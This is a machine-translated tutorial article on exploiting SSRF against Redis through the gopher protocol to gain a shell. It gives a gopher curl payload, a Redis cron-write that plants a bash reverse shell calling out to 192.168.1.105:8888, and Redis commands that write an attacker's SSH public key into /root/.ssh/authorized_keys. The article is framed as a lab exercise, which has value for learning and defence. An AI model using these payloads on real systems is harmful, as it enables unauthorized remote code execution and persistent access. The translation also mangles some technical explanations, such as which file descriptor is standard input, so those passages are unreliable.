Shulou(Shulou.com)05/31 Report--

This article mainly shows you the "example analysis of server request forgery SSRF in Redis", which is easy to understand and well-organized. I hope it can help you solve your doubts. Let me lead you to study and learn the article "sample analysis of server request forgery SSRF in Redis".

SSRF, that is, the server requests forgery. When the server needs to request resources, the requested resources, protocols, paths, etc., can be controlled by the user. Can cause a SSRF attack.

This paper focuses on the SSRF attack on Redis service through gopher protocol, and then getshell.

Gopher protocol format

First of all, understand what the gopher protocol is and what the format looks like:

Gopher://://_ followed by TCP data flow

When we test an attack redis, we can use the curl that comes with linux for testing.

If you use Centos, it is best to turn off selinux for Centos in order to ensure the success of the experiment.

Turn off selinux:

Setenforce 0

Attack redis (1) Experimental Environment Construction

The virtual machine can be installed with Centos7.

Redis installation:

Wget http://download.redis.io/releases/redis-4.0.6.tar.gz / / download redis package

Yum install gcc / / essential gcc when installing make

Tar-xzvf redis-4.0.6.tar.gz / / decompress the package cd redis-4.0.6 / / enter the directory of the package

Make MALLOC=libc / / compilation

After cd src / / compilation is completed, a folder src will be generated and entered into the src folder.

Make install / / installation

Redis runs:

In the redis-4.0.6 directory, redis.conf is the original redis configuration file

Under the redis-4.0.6/src directory, there are two most important executables:

Redis-server-server

Redis-cli-client

Run the server program directly to open the redis service.

. / redis-server

Run the client program directly and connect to the local redis service by default:

. / redis-cli (2) preliminary and introduction attempt to attack Redis without password:

First of all, we have to open the packet capture software to capture the data packets communicating with redis.

In Linux, you can use tcpdump to capture traffic:

Tcpdump-I lo-s 0 port 6379-w redis.pcap

If you want to catch the traffic of the local interface, note that it is lo, not eth0.

We log in first, and then perform the set key operation:

Export the package captured by tcpdump, open it with wireshark, and track the TCP stream

Just look at the data we entered, not the data returned by the server, we can see that there are only a few lines:

In the "Show and Save data as" location, select Hex dump, and you will get the following data:

The one who draws the red box is the payload that will be used later.

Copy everything out and use the editor to remove all extraneous data except the red box

Then add a percent sign to each hexadecimal value and line it up:

Construct a curl request:

Curl-v 'gopher://127.0.0.1:6379/_%2a%31%0d%0a%24%37%0d%0a%43%4f%4d%4d%41%4e%44%0d%0a%2a%33%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%34%0d%0a%6b%65%79%31%0d%0a%24%36%0d%0a%76%61%6c%75%65%31%0d%0a'-- output-

Echo:

Query key:

Key can be set successfully.

Attempt to attack a redis that uses a password:

Configure redis to log in with a password:

Modify the configuration file redis.conf under redis and search for the requirepass keyword.

The default requirepass is annotated. Delete the comment symbol and fill in the password you want to set for redis after requirepass.

The command to start redis after configuration is:

. / redis-server redis profile path

Attempt to attack redis with password:

First, open the tcpdump grab package, and then perform the operation on the redis command line:

Re-capture the traffic, operate as before, and find that password verification is the addition of an auth command:

Just repeat the steps above.

(2) GetShell:

Next, let's talk about the main point: through set key GetShell:

Train of thought:

(1) write the bounce shell command to the scheduled task, and the attack plane only needs to open a netcat port.

(2) write to ssh-keygen for ssh secret-free login.

One by one.

(1) scheduled tasks bounce back shell

Basic requirements:

Redis needs to be run with root permissions, otherwise it cannot be written to the / var/spool/cron/ directory

1. First of all, you need to know what a scheduled task is under Linux:

Set the scheduled task command to crontab under Linux

The configuration file is / etc/crontab

The following figure is the contents of the configuration file, which well illustrates the format of the crontab configuration

This configuration file should be for reference only. Our scheduled tasks need to be manually written in the / var/spool/cron/ directory.

If we want to execute the command echo1 > / tmp/1.txt every minute

You can do this:

Vim / var/spool/cron/root / / root is the file name, which is generally named after the user who executed it

Write in a file

* root echo1 > / tmp/1.txt

After saving and exiting, restart the crontab service:

Systemctl restart crond.service

The command can be executed every minute.

two。 Next, you need to know that under linux, shell is rebounded through input and output streams.

Command:

/ bin/bash-I > & / dev/tcp/192.168.1.105/8888 0 > & 1

Look directly at the effect:

Here is an ingenious combination of file descriptors, redirectors and / dev/ in Linux

The file descriptor 1 represents standard input

File descriptor 2 represents standard output

/ bin/bash-I represents the interaction mode that invokes the bash command and redirects the interaction mode to / dev/tcp/192.168.1.105/8888.

When redirecting, a descriptor & is added to indicate input directly as a data stream. Without adding &, redirection is output to a file by default.

It will be clear by giving an example.

/ dev/tcp/ip address / port number is a special file under linux that indicates a tcp connection to this address port

Here we set up the address where the attack plane is listening.

The last 0 > & 1. At this time, the connection between the attack plane and the target plane has been established, and when the attack plane inputs, it is the 0 (standard input) here.

By redirecting it to 1 (standard input), the system command is executed as standard input to / bin/bash.

3. You also need to know how Redis writes to files.

Key and value in the current database can be exported from Redis

And you can configure the export path and file name through the command:

Config set dir / tmp/test / / set the export path config set dbfilename root / / set the export file name save / / perform the export operation

As you can see, the format is very messy. Fortunately, however, the cron in linux will not report an error, as long as you read a line of correct configuration.

Schedule tasks getshell through crontab

In order for linux to read a line correctly, we manually add\ n (newline) when set key.

Redis statement:

Config set dir / var/spool/cronconfig set dbfilename rootset test1 "\ n\ n\ n * / bin/bash-I > & / dev/tcp/192.168.1.105/8888 0 > & 1\ n\ n\ n" save

Convert to gopher protocol and make curl request:

Successfully written:

Successful getshell:

Note: there is a pit here.

The cron file does not need to write a user name, otherwise an error will be reported:

(2) ssh secret-free login

In linux, ssh can be configured to log in without secret.

Need to modify ssh configuration file / etc/ssh/sshd_config

Set

# StrictModes yes

Change to

StrictModes no

Then restart sshd.

Secret-free login conditions:

The client generates public and private keys

Just upload the public key to the server.

In SSRF utilization, root permission is also required to run redis

If it is not root permission, a user who can log in to ssh is required to run redis

Normal secret-free login process:

1. The client becomes the public key and the private key

Use the tool ssh-keygen:

Ssh-keygen-t rsa

After execution, the public key and private key files will be placed in the .ssh folder in the user's home directory.

A public key with a .pub suffix and a private key without a .pub suffix

two。 Upload the public key to the server

Upload the public key to the server's / root/.ssh directory

If you find it troublesome, you can use ssh-copy-id tools.

3. Rename the file to authorized_keys

The file name should be renamed to authorized_keys

The authorized_keys file is as follows:

If multiple clients need secret-free login, start a new line and write the public key value of the corresponding client in the new line.

Something like this:

4. Secret-free login

After passing it, you can log in without secret:

Ssh secret-free login to getshelll

Now that we know the location of the file to write and what to write (the public key is generated in advance), we can construct the redis statement:

/ / first configure the path config set dir / root/.ssh config set dbfilename authorized_keys// to write the public key set test2 "\ n\ n\ nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC/unZTA0b1HtFsgjXlWM4Bt65Ubx72z/dkLJrqCJJpfsD+F27uix6J3GWuIKaHurabFR40eJ2EqWWs/FCKpBvnJ+msSWWyn9C8WyWY19HydE9ldIO8SjdoOfQ7pf0Q2dwMKSr6F3L8Dy04ULQsCwGEu8X0fdwCZIggagTwGXWZS/M89APJKSVn7v5jhgRy/dCSGwN5wwFakSQSbWtW396V/iP2svU7IAznqIX4tyZII/DX1751LqA0ufVzIoK1Sc9E87swjupDD4ZGxX6ks676JYQHdZSYHoQioM9kWVsB2ntBfBsIFHu+yX1V9tkTTB0E5eaWuitzzsi8xfAz0xBag3f8wiPvlbuLV/TwOXHABGt1HQNhg5wnfZYnebRNdn5QeDXNY1XtLjc3T9UTYe7FmT6hG+RvI+7OSywDIvaGq+PjAQN1KPOBFJtNG5iha3bYds05zR5LCM8ZzLRTcKP9Djo79fum8iOC8DjrxVp49RilDobr1/oZzn+91YJIq1M= root@kali\ n\ n\ n" / / Save save

Change to gopher protocol format:

View the authorized_keys file:

Successful secret-free login:

The above is all the contents of the article "sample Analysis of forged SSRF requests from servers in Redis". Thank you for reading! I believe we all have a certain understanding, hope to share the content to help you, if you want to learn more knowledge, welcome to follow the industry information channel!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.